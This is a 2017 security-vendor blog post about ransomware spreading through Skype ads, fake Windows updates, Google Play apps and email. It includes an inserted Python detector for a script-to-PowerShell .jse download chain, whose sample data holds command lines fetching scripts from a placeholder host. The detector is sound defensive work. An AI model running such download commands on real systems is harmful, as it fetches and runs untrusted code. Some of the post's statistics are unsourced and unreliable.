
March 31, 2017

4 Places You May Find Ransomware Hiding

Remember the days when you really had to try to get a computer virus? Well, those days are gone. We’re living in a different world now, where malware can be hiding just about anywhere on the Internet. In fact, most of the time it's right under your nose. 

One new type of malware that you need to be extra careful about is ransomware, which can lock a computer and/or encrypt its files.

Ransomware is one of the most dangerous types of malware circulating on the Internet, and after a record-setting year in 2016, experts predict we will see a lot more of it this year.

At this point, nearly 50 percent of businesses have been hit with ransomware. And the average ransom demand is $679.

So, where has ransomware been popping up recently? Here are four places where it could be hiding in your business:

1. Skype: According to ZDNet, multiple users have recently seen advertisements on Microsoft’s Skype application that contain ransomware.

One user reported that the ransomware was disguised as an update for the Flash plug-in.

As ZDNet explains, once the download is started it triggers obfuscated JavaScript. Then, the code opens a new command line, deletes the application and runs a PowerShell command. PowerShell then downloads a JavaScript Encoded Script, or JSE, from a dead domain. This process allows the ransomware to evade antivirus software.

So if you’re using Skype in your business, be very careful not to run any suspicious-looking Flash updates or you will have a ransomware attack to deal with.

2. Desktops: One type of ransomware, called Fantom, can be disguised as a Microsoft Windows update. With this type of ransomware, a user will see a fake Windows update box on his or her desktop. The fake update looks very official, as it contains words like “critical update” and has a Microsoft copyright symbol.

Once the user is tricked and the download process takes place, though, Fantom will start encrypting files in the background using AES-128 encryption. Users will see a ransom note that contains the file name Decrypt_Your_Files.HTML. It will also have a user ID key and payment instructions. 

3. Google Play: Think ransomware is only for laptops and PCs? Think again. Mobile ransomware is exploding in popularity right now.

Ransomware, in fact, has been discovered lurking in the Google Play store, disguised as normal-looking applications. All an end user has to do is download a fake application with embedded ransomware by mistake, and ransomware will be deployed onto the mobile device.  

This week, researchers found a new strain of Android-based ransomware which is also capable of evading detection by antivirus software. However, this type of ransomware cannot be decrypted—even after a payment is made.

4. Email inboxes: Email is still one of the top ways that hackers are deploying ransomware. In fact, 93 percent of phishing emails now contain ransomware. End users should be on full alert to avoid clicking on suspicious emails or opening attachments from unknown senders.
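The Skype chain in item 1 (script, then a command line, then PowerShell fetching a .jse file) leaves a recognizable parent/child process trail. As an added example, not from the original article or from ZDNet, this Python code flags that trail in process-creation records; the field names, the script-host list and every sample event are assumptions constructed for illustration.

```python
import re

# Assumption: process-creation records reduced to pid, ppid, image and
# command_line. Every event below is constructed for this example.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # assumed list
JSE_URL = re.compile(r"https?://\S+\.jse\b", re.IGNORECASE)

SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "command_line": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe C:\Users\user\Downloads\update.js"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c <constructed>"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe iwr http://placeholder.example/a.jse -OutFile a.jse"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe iwr http://placeholder.example/b.jse -OutFile b.jse"},
]

def basename(path):
    """Lower-cased executable name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """Image names of the parent chain, nearest parent first."""
    names, seen, ppid = [], set(), event["ppid"]
    while ppid in by_pid and ppid not in seen:  # 'seen' guards against loops
        seen.add(ppid)
        names.append(basename(by_pid[ppid]["image"]))
        ppid = by_pid[ppid]["ppid"]
    return names

def find_jse_chains(events):
    """PIDs of PowerShell processes whose command line references a .jse URL
    and that descend from cmd.exe started under a script host."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        if not JSE_URL.search(e["command_line"]):
            continue
        chain = ancestors(e, by_pid)
        if "cmd.exe" in chain:
            above_cmd = chain[chain.index("cmd.exe") + 1:]
            if SCRIPT_HOSTS.intersection(above_cmd):
                hits.append(e["pid"])
    return hits
```

On the sample data only PID 400 is flagged; PID 500 fetches a .jse file too but was started directly from the desktop shell, so ancestry is what separates the two. Real telemetry reuses PIDs, so key the lookup on a per-process GUID where the log source provides one.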

A new breed of hacktrepreneurs has awoken, and they have little to fear and everything to gain by infecting as many companies as possible and extorting money from them. Apex Technology Services stands ready to protect your company regardless of whether it’s located in New York City; White Plains, New York; Connecticut; Australia; Europe; or anywhere else. Our full suite of cybersecurity and IT support services is at your disposal, enabling you to spend less time worrying about and more time growing your business.

To ensure your security, consider one of our most popular services — Auditing & Documentation, which pinpoints vulnerabilities in your infrastructure, process flow and internal security procedures.






